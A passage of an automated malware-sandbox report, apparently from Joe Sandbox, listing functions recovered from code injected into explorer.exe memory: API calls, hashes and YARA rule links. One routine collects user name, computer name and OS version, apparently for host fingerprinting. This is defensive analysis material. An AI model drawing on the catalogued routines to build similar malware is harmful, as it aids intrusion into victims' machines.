                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: LeaveCriticalSection.KERNEL32 ref: 0E0D9354
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: memcpy.MSVCRT ref: 0E0D936C
                                                                                                                                                                                                                                    • Part of subcall function 0E0D9200: lstrlenA.KERNEL32 ref: 0E0D937A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 0E0E5551
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                  • String ID: 2.5
                                                                                                                                                                                                                                  • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                                  • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction ID: 616cb450be40944c09d51cf635d3ced739123cd6ba4e263db6db87caa6898572
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4416032A14BC09AEB20DF61E8543DEB7A5F788788F844416EB4D57B58EF78C649CB00
                                                                                                                                                                                                                                  Function 102053E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 10205499
                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 102054B3
                                                                                                                                                                                                                                    • Part of subcall function 101FF310: WideCharToMultiByte.KERNEL32 ref: 101FF353
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 102054DC
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 102054ED
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 1020553D
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: EnterCriticalSection.KERNEL32 ref: 101F9248
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: RtlInitializeCriticalSection.NTDLL ref: 101F9255
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcpyA.KERNEL32 ref: 101F928A
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcpyA.KERNEL32 ref: 101F92AD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcatA.KERNEL32 ref: 101F92BD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrcatA.KERNEL32 ref: 101F92CD
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: LeaveCriticalSection.KERNEL32 ref: 101F9354
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: memcpy.MSVCRT ref: 101F936C
                                                                                                                                                                                                                                    • Part of subcall function 101F9200: lstrlenA.KERNEL32 ref: 101F937A
                                                                                                                                                                                                                                  • free.MSVCRT ref: 10205551
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                  • String ID: 2.5
                                                                                                                                                                                                                                  • API String ID: 2800961625-2233083363
                                                                                                                                                                                                                                  • Opcode ID: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction ID: 63dc3a9e6c58fce9d2748ce41f98b9ef9adb124a5dbd976dc426ea2a1b8c66f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e486100a408e8a09d9c892e745f7fcd54317b0b843c8af37b398ee0991724894
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E418276614B848AD720CF61E8943DEB7B5FB88788F804016EA8D47A5CDFBCD245CB50
                                                                                                                                                                                                                                  Function 0E0F1ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0E0F1AE6
                                                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 0E0F1B0F
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0E0F1B70
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0F1AC3
                                                                                                                                                                                                                                    • Part of subcall function 0E0EF930: _getptd_noexit.LIBCMT ref: 0E0EF936
                                                                                                                                                                                                                                    • Part of subcall function 0E0EF930: _amsg_exit.LIBCMT ref: 0E0EF946
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0F1B75
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0E0F1B81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: 4e5df6546a66d1d7cec2588f89a93fea8d84179577b76bb77c93ccc3bfea7e69
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13215E36205681C6D730DF12E08039EB7A1F388BA5F044626CF9907F95DF39D896CB41
                                                                                                                                                                                                                                  Function 0DF41ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0DF41AE6
                                                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 0DF41B0F
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0DF41B70
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF41AC3
                                                                                                                                                                                                                                    • Part of subcall function 0DF3F930: _getptd_noexit.LIBCMT ref: 0DF3F936
                                                                                                                                                                                                                                    • Part of subcall function 0DF3F930: _amsg_exit.LIBCMT ref: 0DF3F946
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF41B75
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0DF41B81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: d06a5422e0e46978879536b1151af1d8e3210cef4ee1fb29f2a4fc3379525169
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0521F97660464086C630DF19E44036E7B60F785BA5F06C216DF9D07764DF39D886CB41
                                                                                                                                                                                                                                  Function 10211ABB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 10211AE6
                                                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 10211B0F
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 10211B70
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 10211AC3
                                                                                                                                                                                                                                    • Part of subcall function 1020F930: _getptd_noexit.LIBCMT ref: 1020F936
                                                                                                                                                                                                                                    • Part of subcall function 1020F930: _amsg_exit.LIBCMT ref: 1020F946
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 10211B75
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 10211B81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction ID: b002ea764979226feb9c5b9a39641c58298f65ca63673501d4de71172e7076f3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0493b9f846b5b139c1dba710583825883d891ca64fc96f4133c7dfe5acc6fa05
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E21517A20478586C730CF11E08075E77B0F784BA9F114211DF990BB98DF39E996CB41
                                                                                                                                                                                                                                  Function 0E0EC0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0EC105
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0EC0FA
                                                                                                                                                                                                                                    • Part of subcall function 0E0EFBA8: _getptd_noexit.LIBCMT ref: 0E0EFBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E0EC14D
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0EC15C
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0EC167
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction ID: 63540f0751f536c00be4cfdd22d411609aed6a3cb16fdd5b3b4a739fd698f9cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 162126727153C18AFF64576294D037DE6E0B786BE0F944671EAA907F98CA6ECD418B00
                                                                                                                                                                                                                                  Function 0DF3C0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF3C105
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF3C0FA
                                                                                                                                                                                                                                    • Part of subcall function 0DF3FBA8: _getptd_noexit.LIBCMT ref: 0DF3FBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF3C14D
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF3C15C
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF3C167
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction ID: bbfb19e83584951c98e627704c380b42ecd5370aed61199a5cd1d179e8c15c83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B32129A2B0838192DF25672D998033D7260BB84BE4F57C225EB9967B98CB6CC9419B00
                                                                                                                                                                                                                                  Function 1020C0E8 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 1020C105
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 1020C0FA
                                                                                                                                                                                                                                    • Part of subcall function 1020FBA8: _getptd_noexit.LIBCMT ref: 1020FBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1020C14D
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 1020C15C
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 1020C167
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction ID: 30e160923cce56520ded8c42b317d1473abafa6f918eb938b3ec166fedc75435
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9a86a9efd74fc33782b812af69bacd50b57b32c5077f2c9d5c0e42d9b4a8a91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB21F9F27143CA82DF548B21948131DB661F789BE4F714221EAAD07B9DCA6CC9B1CF00
                                                                                                                                                                                                                                  Function 0E0E5B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2370468470-0
                                                                                                                                                                                                                                  • Opcode ID: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                                  • Instruction ID: 633d9fe4c38bd21304fc0a212469288be818906f400c45683e8e557991695540
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1116035604B808ADB549F62ED603AAA3A0BB88FC8F084865DE4A63B55DF3CC1858704
                                                                                                                                                                                                                                  Function 0DF35B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2370468470-0
                                                                                                                                                                                                                                  • Opcode ID: 23cf9390cb8199c783ebb6c3488d327ae55b3b95fb3aa94f8d3b5975ffb69508
                                                                                                                                                                                                                                  • Instruction ID: 675849a36c940ae4714200e8e1b8f75535df2412bef094d47345bb63a27c77a4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23cf9390cb8199c783ebb6c3488d327ae55b3b95fb3aa94f8d3b5975ffb69508
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50117C21604B4282EB549FA6BD0033AB3A0FB89FD8F188136DE8A93F18DF7CC1448700
                                                                                                                                                                                                                                  Function 10205B50 Relevance: 12.1, APIs: 8, Instructions: 57stringthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2370468470-0
                                                                                                                                                                                                                                  • Opcode ID: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                                  • Instruction ID: 8b3b82b2ae39b2d2b82c7ee43fa32aa7368f269bc714f73cd989afc95379deb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9abf60a1bda62b455fc1ebc578719defbf62091858874b3fa4bb3827806bcb7a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4117F35304B4183EB548F62B9583AAB3A1FB8DFD8F080026EE8A57B18DF7CC1948704
                                                                                                                                                                                                                                  Function 0E0E5780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$malloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3301496367-0
                                                                                                                                                                                                                                  • Opcode ID: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                                  • Instruction ID: 0b323825534b24e2d2c6b4a58d45c93bb8ff326245d487b067a91c6f2ccdb3d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69315B7A714B8486DA10CF66E85439AB7A5F788BC8F944865EF8E63B14DF3CC485CB00
                                                                                                                                                                                                                                  Function 0DF35780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$malloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3301496367-0
                                                                                                                                                                                                                                  • Opcode ID: fbfbbdd83794e65d7895c3329bb9515f5b568a2036b9023914a40692d2934db5
                                                                                                                                                                                                                                  • Instruction ID: 7728a00648401ef27e305fae875dcc55edc9418e17f9631d168220abf1954bea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbfbbdd83794e65d7895c3329bb9515f5b568a2036b9023914a40692d2934db5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F315E76614B8587DA10CFA6E84436AB7A5F789BC8F658426DF8E53B14DF3CC095CB00
                                                                                                                                                                                                                                  Function 10205780 Relevance: 11.3, APIs: 9, Instructions: 92stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$malloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3301496367-0
                                                                                                                                                                                                                                  • Opcode ID: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                                  • Instruction ID: d2769fa6f9acf3dab232b99a217693b669ffa59998277bbf61249c17e75a6a54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e23c31e38dd96f206263be40e73b7d31154da733f725efe975d28a218771bd5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A731BA36214B8582DB04CFA2E45835AB7A1F788BC8F509526EF8E47B18DF7CC495CB00
                                                                                                                                                                                                                                  Function 08A283F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 08A28424
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A28419
                                                                                                                                                                                                                                    • Part of subcall function 08A1F4DD: _getptd_noexit.LIBCMT ref: 08A1F4E1
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A284C7
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 08A284D2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
